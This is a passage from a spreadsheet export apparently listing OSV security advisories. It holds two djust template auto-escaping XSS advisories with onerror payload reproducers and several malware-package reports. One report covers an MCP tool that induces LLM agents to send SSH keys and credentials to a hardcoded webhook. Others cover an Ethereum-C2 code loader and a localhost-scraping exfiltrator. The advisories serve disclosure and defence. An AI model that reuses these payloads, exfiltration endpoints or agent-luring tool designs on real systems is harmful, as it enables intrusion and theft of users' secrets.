      <c r="S1040" s="5" t="inlineStr">
        <is>
          <t>Five independent defects in djust's template auto-escaping cause attacker-controlled input to be rendered as live markup where Django escapes it. All four are present in shipped 1.1.0 and are fixed in 1.1.1.
They share one shape: **a filter or grant that escapes nothing itself and relies on the render-time auto-escape, which something downstream then removes.** They are grouped into a single advisory because the mitigation is identical — upgrade to 1.1.1 — and because no single one of them is meaningfully actionable in isolation.
## 1. `linenumbers` never escaped its input (#2291)
```
{{ p|linenumbers|safe }}   with p = '&lt;img src=x onerror=alert(1)&gt;'
  djust   '1. &lt;img src=x onerror=alert(1)&gt;'      &lt;- executes
  django  '1. &amp;lt;img src=x onerror=alert(1)&amp;gt;'
```
The filter deferred all escaping to render time; a trailing `|safe` suppressed exactly that. The exposure is wider than the `|safe` form: **any downstream filter that reads the output as markup is affected**, including `{{ p|linenumbers|truncatechars_html:"5" }}`, which contains no `|safe` at all.
## 2. `escape` was a no-op (#2281)
```
{{ p|escape|safe }}
  djust   '&lt;img src=x onerror=alert(1)&gt;'          &lt;- executes
  django  '&amp;amp;lt;img src=x onerror=alert(1)&amp;amp;gt;'
```
Django's `escape` is eager (`conditional_escape`, returning `SafeString`). djust's returned its input unchanged and let the render site escape it — indistinguishable for `{{ p|escape }}` alone, wrong for every chain. The security cell is `{{ p|escape|safe }}`: an idiom that reads as "escape it, then it is safe to emit" — which is what Django's semantics make true — was a bare `|safe` on attacker input. A sweep of every length-2 and length-3 chain containing `escape` found **104** live-markup cells.
## 3. `unordered_list` / `safeseq` handed a string back under a safe grant (#2274)
Both carry an unconditional "emit without escaping" grant, earned because they escape every item they emit. Given a **string** rather than a sequence they emitted nothing and returned the input verbatim under that same grant, making `{{ hostile|safeseq }}` an exact synonym for `|safe` with no `mark_safe` anywhere in the template.
## 4. A safety grant outlived the value it was granted for (#2300)
**No filter chain and no `|safe` anywhere; a bare `{{ p }}` is the whole reproducer.**
Safe context keys accumulated on the view and were never revoked, so a key marked safe once stayed safe for the lifetime of the view — which spans **every event on a WebSocket connection**:
```python
render 1:  p = mark_safe('&lt;b&gt;trusted&lt;/b&gt;')     -&gt;  '&lt;b&gt;trusted&lt;/b&gt;'   correct
render 2:  p = '&lt;img src=x onerror=alert(1)&gt;'  -&gt;  executes
```
A view that renders trusted markup into a variable and later renders user input into the same variable emits it live.
## 5. A custom tag handler's return was emitted raw — including djust's own `{% render_slot %}` (#2379)
**Reachable with no `|safe`, no `mark_safe`, and no application code: using component slots is enough.**
Django's `SimpleNode.render` runs `conditional_escape` over a `simple_tag`'s return
unless it carries `__html__`. djust inserted the return verbatim, so a handler as
ordinary as `return f"Hello {name}"` emitted attacker markup live.
Of the 221 handlers djust registers, one echoes a context value unescaped —
`render_slot`, the framework's own function-component/slot tag:
```
{% render_slot p %}     p = '&lt;img src=x onerror=alert(1)&gt;'
  djust   '&lt;img src=x onerror=alert(1)&gt;'          &lt;- executes
  django  '&amp;lt;img src=x onerror=alert(1)&amp;gt;'
```
Together with defect 3 this is one of the two classes reachable without the
application writing anything unusual.
## 6. `linebreaks` / `linebreaksbr` — and `|safe` was the only spelling that worked (#2284)
`linebreaks` emits `&lt;p&gt;`/`&lt;br&gt;` but neither escaped its content nor reported its
output safe. The plain spelling therefore escaped the filter's **own** tags and
printed a literal `&lt;p&gt;` on the page, so `|safe` was the only form that rendered
at all — and that form emitted the content live:
```
{{ bio|linebreaks }}         renders literal '&lt;p&gt;' text        (visibly broken)
{{ bio|linebreaks|safe }}    '&lt;img src=x onerror=alert(1)&gt;'    &lt;- executes
```
Because the broken spelling is the one a developer discards, the vulnerable
spelling is the one that ships. Any application rendering user-entered text with
paragraph breaks is written that way.
## Impact
Stored or reflected XSS in any djust application that renders untrusted input through the affected filters, or that reuses a context variable which was previously marked safe. Exploitation requires no special configuration. Defects 3, 4 and 5 require no unusual template construct at all — defect 5 needs only that the application use component slots, and defect 6's vulnerable spelling is the only one that renders correctly.
## Patches
Fixed in **1.1.1**, and in **1.2.0** (`main`).
1.1.1 re-implements each fix against 1.1.0's own code rather than back-porting `main`'s, which depends on a value-level safety model 1.1.0 does not have. Three consequences are documented in the 1.1.1 CHANGELOG and are all in the **over-escaping** direction: `{{ p|escape|F }}` double-escapes for a plain following filter `F`; `{% render_slot slot.content %}` over-escapes; and a `mark_safe`d value passed through `|escape` is escaped rather than passed through.
**Not fixed in 1.1.1**, and tracked separately: application-written tag handlers that return attacker data as a plain `str` (only djust's own `render_slot` is covered by defect 5), and a `{% with %}`/`{% for %}` bind inheriting a safety grant it never earned. Both are fixed in 1.2.0.
## Workarounds
None complete. Before upgrading, avoid `|safe` after any filter in a chain, avoid `safeseq`/`unordered_list` on values that may be strings, and avoid reusing a context variable for both `mark_safe` content and untrusted input.
## Credit
Found during an internal Django-parity audit by a registry-wide differential that compares djust's escaping capabilities against Django's across every filter chain, rather than by inspection.</t>
        </is>
      </c>
      <c r="T1040" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-9395-2g46-rj3f</t>
        </is>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1041" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1041" s="5" t="inlineStr">
        <is>
          <t>GHSA-cqc9-f5fp-r45q</t>
        </is>
      </c>
      <c r="D1041" s="5" t="inlineStr"/>
      <c r="E1041" s="5" t="inlineStr"/>
      <c r="F1041" s="5" t="inlineStr"/>
      <c r="G1041" s="5" t="inlineStr"/>
      <c r="H1041" s="5" t="inlineStr"/>
      <c r="I1041" s="5" t="inlineStr"/>
      <c r="J1041" s="5" t="inlineStr"/>
      <c r="K1041" s="5" t="inlineStr"/>
      <c r="L1041" s="5" t="inlineStr">
        <is>
          <t>npm:randompkgd</t>
        </is>
      </c>
      <c r="M1041" s="5" t="inlineStr"/>
      <c r="N1041" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1041" s="5" t="inlineStr"/>
      <c r="R1041" s="5" t="inlineStr"/>
      <c r="S1041" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (c0ebd1d508d7c8ae4aa2a0693b9d07720a837307b1a5c343c931c6e7d72d6390)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1" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16258</t>
        </is>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1042" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1042" s="5" t="inlineStr">
        <is>
          <t>GHSA-f8wr-9w83-7gmw</t>
        </is>
      </c>
      <c r="D1042" s="5" t="inlineStr"/>
      <c r="E1042" s="5" t="inlineStr"/>
      <c r="F1042" s="5" t="inlineStr"/>
      <c r="G1042" s="5" t="inlineStr"/>
      <c r="H1042" s="5" t="inlineStr"/>
      <c r="I1042" s="5" t="inlineStr"/>
      <c r="J1042" s="5" t="inlineStr"/>
      <c r="K1042" s="5" t="inlineStr"/>
      <c r="L1042" s="5" t="inlineStr">
        <is>
          <t>npm:kartykgithub-takedown-b</t>
        </is>
      </c>
      <c r="M1042" s="5" t="inlineStr"/>
      <c r="N1042" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1042" s="5" t="inlineStr"/>
      <c r="R1042" s="5" t="inlineStr"/>
      <c r="S1042" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (6844bb41cfa32b3ead1bd2558d13f9114c93fc9cea7be43ed4063726f259d405)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2" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16249</t>
        </is>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1043" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1043" s="5" t="inlineStr">
        <is>
          <t>GHSA-p8m5-fmxm-99f6</t>
        </is>
      </c>
      <c r="D1043" s="5" t="inlineStr"/>
      <c r="E1043" s="5" t="inlineStr"/>
      <c r="F1043" s="5" t="inlineStr"/>
      <c r="G1043" s="5" t="inlineStr"/>
      <c r="H1043" s="5" t="inlineStr"/>
      <c r="I1043" s="5" t="inlineStr"/>
      <c r="J1043" s="5" t="inlineStr"/>
      <c r="K1043" s="5" t="inlineStr"/>
      <c r="L1043" s="5" t="inlineStr">
        <is>
          <t>npm:randompkgc</t>
        </is>
      </c>
      <c r="M1043" s="5" t="inlineStr"/>
      <c r="N1043" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1043" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1043" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1043" s="5" t="inlineStr"/>
      <c r="R1043" s="5" t="inlineStr"/>
      <c r="S1043" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (7ce22b64e51787a332ae7c65afc8789c0fb3f806199aa79d72af9ff02eb867d1)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3" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16257</t>
        </is>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1044" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1044" s="5" t="inlineStr">
        <is>
          <t>GHSA-p957-4pc7-x6hp</t>
        </is>
      </c>
      <c r="D1044" s="5" t="inlineStr"/>
      <c r="E1044" s="5" t="inlineStr"/>
      <c r="F1044" s="5" t="inlineStr"/>
      <c r="G1044" s="5" t="inlineStr"/>
      <c r="H1044" s="5" t="inlineStr"/>
      <c r="I1044" s="5" t="inlineStr"/>
      <c r="J1044" s="5" t="inlineStr"/>
      <c r="K1044" s="5" t="inlineStr"/>
      <c r="L1044" s="5" t="inlineStr">
        <is>
          <t>npm:kartykgithub-multiversion-a</t>
        </is>
      </c>
      <c r="M1044" s="5" t="inlineStr"/>
      <c r="N1044" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1044" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1044" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1044" s="5" t="inlineStr"/>
      <c r="R1044" s="5" t="inlineStr"/>
      <c r="S1044" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (cf524b1c8a586bcece6d65140e168a40adec8699c1cc7af61263bfd2a6b84543)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4" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16272</t>
        </is>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1045" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1045" s="5" t="inlineStr">
        <is>
          <t>GHSA-q83w-3hvr-fgg7</t>
        </is>
      </c>
      <c r="D1045" s="5" t="inlineStr"/>
      <c r="E1045" s="5" t="inlineStr"/>
      <c r="F1045" s="5" t="inlineStr"/>
      <c r="G1045" s="5" t="inlineStr"/>
      <c r="H1045" s="5" t="inlineStr"/>
      <c r="I1045" s="5" t="inlineStr"/>
      <c r="J1045" s="5" t="inlineStr"/>
      <c r="K1045" s="5" t="inlineStr"/>
      <c r="L1045" s="5" t="inlineStr">
        <is>
          <t>npm:@kartyk-github-org/takedown-b</t>
        </is>
      </c>
      <c r="M1045" s="5" t="inlineStr"/>
      <c r="N1045" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1045" s="5" t="inlineStr"/>
      <c r="R1045" s="5" t="inlineStr"/>
      <c r="S1045" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (f59dc68aae74875f986021660cb054d4055e7f7113e31234e8a9589c44edfb6f)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5" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16266</t>
        </is>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1046" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1046" s="5" t="inlineStr">
        <is>
          <t>GHSA-rc4q-v4pf-8j7x</t>
        </is>
      </c>
      <c r="D1046" s="5" t="inlineStr"/>
      <c r="E1046" s="5" t="inlineStr"/>
      <c r="F1046" s="5" t="inlineStr"/>
      <c r="G1046" s="5" t="inlineStr"/>
      <c r="H1046" s="5" t="inlineStr"/>
      <c r="I1046" s="5" t="inlineStr"/>
      <c r="J1046" s="5" t="inlineStr"/>
      <c r="K1046" s="5" t="inlineStr"/>
      <c r="L1046" s="5" t="inlineStr">
        <is>
          <t>npm:randompkge</t>
        </is>
      </c>
      <c r="M1046" s="5" t="inlineStr"/>
      <c r="N1046" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1046" s="5" t="inlineStr"/>
      <c r="R1046" s="5" t="inlineStr"/>
      <c r="S1046" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (95eb389e78a05b76dfefafd460f3280f3fabf8fcd1dfc55946b04bef84b26116)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6" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16259</t>
        </is>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1047" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1047" s="5" t="inlineStr">
        <is>
          <t>GHSA-rx76-mcg9-gqc5</t>
        </is>
      </c>
      <c r="D1047" s="5" t="inlineStr"/>
      <c r="E1047" s="5" t="inlineStr"/>
      <c r="F1047" s="5" t="inlineStr"/>
      <c r="G1047" s="5" t="inlineStr"/>
      <c r="H1047" s="5" t="inlineStr"/>
      <c r="I1047" s="5" t="inlineStr"/>
      <c r="J1047" s="5" t="inlineStr"/>
      <c r="K1047" s="5" t="inlineStr"/>
      <c r="L1047" s="5" t="inlineStr">
        <is>
          <t>npm:@kartyk-github-org/takedown-a</t>
        </is>
      </c>
      <c r="M1047" s="5" t="inlineStr"/>
      <c r="N1047" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1047" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1047" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1047" s="5" t="inlineStr"/>
      <c r="R1047" s="5" t="inlineStr"/>
      <c r="S1047" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (bf2fb1adf14524d97cbb2a621413f9d25b8ac020fc927b92fa8f9aff52edef70)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7" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16265</t>
        </is>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1048" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1048" s="5" t="inlineStr">
        <is>
          <t>GHSA-vxvv-gh3g-35pj</t>
        </is>
      </c>
      <c r="D1048" s="5" t="inlineStr"/>
      <c r="E1048" s="5" t="inlineStr"/>
      <c r="F1048" s="5" t="inlineStr"/>
      <c r="G1048" s="5" t="inlineStr"/>
      <c r="H1048" s="5" t="inlineStr"/>
      <c r="I1048" s="5" t="inlineStr"/>
      <c r="J1048" s="5" t="inlineStr"/>
      <c r="K1048" s="5" t="inlineStr"/>
      <c r="L1048" s="5" t="inlineStr">
        <is>
          <t>npm:randompkgb</t>
        </is>
      </c>
      <c r="M1048" s="5" t="inlineStr"/>
      <c r="N1048" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1048" s="5" t="inlineStr"/>
      <c r="R1048" s="5" t="inlineStr"/>
      <c r="S1048" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (5daf14ba0ddb406ffdd9b17e6be63713fe9f66cf739753e8b20ffb128a8b1323)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048" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16256</t>
        </is>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1049" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1049" s="5" t="inlineStr">
        <is>
          <t>GHSA-xjw9-38cr-6372</t>
        </is>
      </c>
      <c r="D1049" s="5" t="inlineStr"/>
      <c r="E1049" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1049" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1049" s="5" t="inlineStr"/>
      <c r="H1049" s="5" t="inlineStr"/>
      <c r="I1049" s="5" t="inlineStr"/>
      <c r="J1049" s="5" t="inlineStr"/>
      <c r="K1049" s="5" t="inlineStr"/>
      <c r="L1049" s="5" t="inlineStr">
        <is>
          <t>PyPI:djust</t>
        </is>
      </c>
      <c r="M1049" s="5" t="inlineStr">
        <is>
          <t>1.1.2</t>
        </is>
      </c>
      <c r="N1049" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1049" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1049" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1049" s="5" t="inlineStr"/>
      <c r="R1049" s="5" t="inlineStr"/>
      <c r="S1049" s="5" t="inlineStr">
        <is>
          <t>A context safety grant was inherited by a template **binding** that never earned it, so rebinding a name the view had marked safe left the mark attached to the new, attacker-controlled value.
djust's context safety channel is keyed by **name**, not by value. Every bind copied the value and left the grant in place:
```
view marks   p = mark_safe('&lt;b&gt;trusted&lt;/b&gt;')
template     {% with p=user_input %}{{ p }}{% endwith %}
  djust   '&lt;img src=x onerror=alert(1)&gt;'          &lt;- executes
  django  '&amp;lt;img src=x onerror=alert(1)&amp;gt;'
```
## Affected binds
Eight distinct shapes were live. All are fixed in 1.1.2:
| shape | example |
|---|---|
| `{% with %}` rebinding a marked name | `{% with p=hostile %}{{ p }}{% endwith %}` |
| `{% with %}` **descendant** of a rebound name | `{% with p=hostile %}{{ p.a }}{% endwith %}` |
| `{% with %}` binding over a marked name | `{% with q=hostile %}{{ q }}{% endwith %}` |
| `{% for %}` loop variable | `{% for p in hostiles %}{{ p }}{% endfor %}` |
| `{% for %}` descendant | `{% for p in hostiles %}{{ p.a }}{% endfor %}` |
| `{% for %}` tuple unpacking | `{% for k, v in rows %}{{ v }}{% endfor %}` |
| `{% include … with %}` | `{% include "c.html" with q=hostile %}` |
| assign tags | `{% … as x %}` |
No filter chain and no `|safe` anywhere in the template is required. The precondition is that the application marked *some* value safe under a name that a template later rebinds — an ordinary pattern, since a view commonly marks trusted markup safe and templates commonly reuse short names such as `p`, `item` or `row`.
## Impact
Stored or reflected XSS in any djust application that combines `mark_safe` (or any framework path that grants a context key safety) with a template that rebinds that name. Exploitation requires no unusual template construct.
## Patches
Fixed in **1.1.2**, and in 1.2.0 (`main`).
The rule is that a bind **replaces** the grant rather than inheriting one. It is stated that way deliberately: the originally reported defects pointed the *opposite* direction — a grant being **lost** across some binds, causing over-escaping — and fixing only the reported direction would have left this leak in place. Both directions are the same rule.
**Not fixed in 1.1.2**, and tracked for 1.2.0: two over-escaping cases where a grant fails to travel with a value that legitimately carries one (`{% with body=post.text|linebreaks %}`, and `mark_safe` reaching a template through `dict.values` / `dict.items`). Both escape *more* than Django rather than less, so neither is a leak.
## Workarounds
Before upgrading, avoid reusing a context name for both `mark_safe`'d content and untrusted input, and avoid rebinding such a name in `{% with %}`, `{% for %}`, `{% include … with %}` or an assign tag.
## Credit
Found while preparing the 1.1.1 security release: the reproducer published in GHSA-9395-2g46-rj3f was run against the built 1.1.1 artifact before that advisory was published, and proved the class was still live. Publishing the original text would have reported this class as patched when it was not.</t>
        </is>
      </c>
      <c r="T1049" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-xjw9-38cr-6372</t>
        </is>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1050" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1050" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16250</t>
        </is>
      </c>
      <c r="D1050" s="5" t="inlineStr"/>
      <c r="E1050" s="5" t="inlineStr"/>
      <c r="F1050" s="5" t="inlineStr"/>
      <c r="G1050" s="5" t="inlineStr"/>
      <c r="H1050" s="5" t="inlineStr"/>
      <c r="I1050" s="5" t="inlineStr"/>
      <c r="J1050" s="5" t="inlineStr"/>
      <c r="K1050" s="5" t="inlineStr"/>
      <c r="L1050" s="5" t="inlineStr">
        <is>
          <t>PyPI:marketing-mcp</t>
        </is>
      </c>
      <c r="M1050" s="5" t="inlineStr"/>
      <c r="N1050" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1050" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1050" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1050" s="5" t="inlineStr"/>
      <c r="R1050" s="5" t="inlineStr"/>
      <c r="S1050" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (87216e00fe68e2de8b140f1f9ffc2db5a8e814f38030e2eb6120c9ae9e7ca3ff)
The package exposes an MCP tool `send(path)` that reads a caller-specified local file and POSTs its contents to a hardcoded `https://webhook.site/4acf7132-a75e-47e1-aeff-0350c8eac16c` endpoint. The destination is a fixed public request-capture service, is not caller-configurable, and is not the installer's infrastructure. Any file path an LLM agent is induced to pass to `send` — including sensitive paths such as `~/.ssh/id_rsa`, `~/.aws/credentials`, `.env` files, or source trees — is uploaded to that third-party capture URL where the operator of the webhook can retrieve it. The package's advertised marketing/MCP framing does not match the actual behavior, which is a one-way file relay to an author-controlled inspection endpoint.
## Source: kam193 (6a271b29f840e2047c34363e985921e1a374194cfcae7524698f178c96bea9eb)
Package attempts to lure LLM agents to exfiltrate files to a hardcoded location. Analysis of infrastructure suggests preparing for exfiltrating credentials.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-marketing-mcp
Reasons (based on the campaign):
 - files-exfiltration
 - llm-threat
</t>
        </is>
      </c>
      <c r="T1050" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16250</t>
        </is>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1051" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1051" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16251</t>
        </is>
      </c>
      <c r="D1051" s="5" t="inlineStr"/>
      <c r="E1051" s="5" t="inlineStr"/>
      <c r="F1051" s="5" t="inlineStr"/>
      <c r="G1051" s="5" t="inlineStr"/>
      <c r="H1051" s="5" t="inlineStr"/>
      <c r="I1051" s="5" t="inlineStr"/>
      <c r="J1051" s="5" t="inlineStr"/>
      <c r="K1051" s="5" t="inlineStr"/>
      <c r="L1051" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-contact-form</t>
        </is>
      </c>
      <c r="M1051" s="5" t="inlineStr"/>
      <c r="N1051" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1051" s="5" t="inlineStr"/>
      <c r="R1051" s="5" t="inlineStr"/>
      <c r="S1051" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0b198bc6d5af472f9cb1f1db25acf0215b77c04a742fcce81fef5565d76d837b)
Package presents itself as the Tailwind CSS forms plugin (README is a verbatim copy of @tailwindcss/forms and its package.json points at github.com/tailwindlabs/tailwindcss-forms), and the README instructs users to require('tailwindcss-contact-form') from their tailwind.config.js. The single main file src/index.js is heavily obfuscated (obfuscator.io-style rotated string array, hex identifiers, control-flow flattening) and, when required, imports node:http/node:https and spawn from node:child_process, queries public Ethereum RPCs (eth.drpc.org, ethereum-rpc.publicnode.com, 1rpc.io/eth, public.blastapi.io) and the Blockscout txlist API for outbound transactions of the hardcoded address 0xa322E5f3D311D3080e6f0121063e9aDC2490Ef1a, extracts a base64 payload from transaction data (x-payload-B64), and executes it by spawning node. This is a remote-code-execution loader using the Ethereum blockchain as a command-and-control channel: whoever controls the hardcoded key controls code execution on every machine that imports the package. The Tailwind-forms cover story, verbatim README, and forged repository link exist to trick developers into wiring the require() into their build config.
</t>
        </is>
      </c>
      <c r="T1051" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16251</t>
        </is>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1052" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1052" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16252</t>
        </is>
      </c>
      <c r="D1052" s="5" t="inlineStr"/>
      <c r="E1052" s="5" t="inlineStr"/>
      <c r="F1052" s="5" t="inlineStr"/>
      <c r="G1052" s="5" t="inlineStr"/>
      <c r="H1052" s="5" t="inlineStr"/>
      <c r="I1052" s="5" t="inlineStr"/>
      <c r="J1052" s="5" t="inlineStr"/>
      <c r="K1052" s="5" t="inlineStr"/>
      <c r="L1052" s="5" t="inlineStr">
        <is>
          <t>npm:ragacateslikodi</t>
        </is>
      </c>
      <c r="M1052" s="5" t="inlineStr"/>
      <c r="N1052" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1052" s="5" t="inlineStr"/>
      <c r="R1052" s="5" t="inlineStr"/>
      <c r="S1052" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (09a5a8774b4ce673a050b7e26c7d08aec66320fc14257196157363935ac19aa1)
On require/import of the package's main entry, a top-level async IIFE probes http://localhost:5000 for a hardcoded set of paths (/admin, /flag, /profile variants), concatenates status, length, and any body content matching flag patterns from those responses, and POSTs the aggregated result to a hardcoded webhook.site endpoint (https://webhook.site/1895d1d5-b227-4ce4-a2ce-232b1bec8b65). Package metadata is empty (no description, author, or repository), and the package ships no legitimate functionality alongside this behavior. Installing and importing this package causes any locally accessible service on port 5000 — including internal admin interfaces or CTF-style flag endpoints — to be scraped and its responses sent to an attacker-controlled collector.
</t>
        </is>
      </c>
      <c r="T1052" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16252</t>
        </is>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
